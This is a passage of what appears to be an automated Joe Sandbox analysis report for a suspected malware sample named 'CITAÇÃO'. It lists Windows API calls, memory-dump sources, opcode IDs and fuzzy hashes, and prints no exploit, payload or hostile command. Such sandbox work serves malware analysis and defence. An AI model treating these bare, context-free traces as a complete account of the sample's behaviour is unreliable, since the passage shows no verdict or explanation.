                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 3375834691-2298589950
                                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: $<
                                                      • API String ID: 4104443479-428540627
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID: \VH
                                                      • API String ID: 1682464887-234962358
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID: \VH
                                                      • API String ID: 1682464887-234962358
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID: \VH
                                                      • API String ID: 1682464887-234962358
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: \VH
                                                      • API String ID: 2507767853-234962358
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: \VH
                                                      • API String ID: 2507767853-234962358
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                      Strings
                                                      Similarity
                                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                      • String ID: crts
                                                      • API String ID: 943502515-3724388283
                                                      APIs
                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                      Strings
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$LabelVolume
                                                      • String ID: \VH
                                                      • API String ID: 2006950084-234962358
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                      • DrawMenuBar.USER32 ref: 00449761
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                      • String ID: 0
                                                      • API String ID: 772068139-4108050209
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: _wcslen$_wcscpy
                                                      • String ID: 3, 3, 8, 1
                                                      • API String ID: 3469035223-357260408
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                      • API String ID: 2574300362-3530519716
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                      • API String ID: 2574300362-275556492
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                      • API String ID: 2574300362-58917771
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      APIs
                                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                      • __itow.LIBCMT ref: 004699CD
                                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                      • __itow.LIBCMT ref: 00469A97
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      APIs
                                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      APIs
                                                      • GetParent.USER32(?), ref: 004503C8
                                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                      Similarity
                                                      • API ID: Proc$Parent
                                                      • String ID:
                                                      • API String ID: 2351499541-0
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                      • TranslateMessage.USER32(?), ref: 00442B01
                                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchTranslate
                                                      • String ID:
                                                      • API String ID: 1795658109-0
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                      • GetCaretPos.USER32(?), ref: 004743B2
                                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                      • GetForegroundWindow.USER32 ref: 004743EE
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      APIs
                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                      • _wcslen.LIBCMT ref: 00449519
                                                      • _wcslen.LIBCMT ref: 00449526
                                                      Similarity
                                                      • API ID: MessageSend_wcslen$_wcspbrk
                                                      • String ID:
                                                      • API String ID: 2886238975-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __setmode$DebugOutputString_fprintf
                                                      • String ID:
                                                      • API String ID: 1792727568-0
                                                      APIs
                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      APIs
                                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                      Strings
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                      • String ID: cdecl
                                                      • API String ID: 3850814276-3896280584
                                                      APIs
                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                      • _memmove.LIBCMT ref: 0046D475
                                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 2502553879-0
                                                      APIs
                                                      • SendMessageW.USER32 ref: 00448C69
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      APIs
                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                      Similarity
                                                      • API ID: ErrorLastacceptselect
                                                      • String ID:
                                                      • API String ID: 385091864-0
                                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateMessageObjectSendShowStock
                                                      • String ID:
                                                      • API String ID: 1358664141-0
                                                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                      • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                      • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                      • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                      • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                      • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                      • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0043392E
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • __wsplitpath.LIBCMT ref: 00433950
                                                      • __wcsicoll.LIBCMT ref: 00433974
                                                      • __wcsicoll.LIBCMT ref: 0043398A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                      • String ID:
                                                      • API String ID: 1187119602-0
                                                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1597257046-0
                                                      • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                      • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                                      • String ID:
                                                      • API String ID: 237123855-0
                                                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
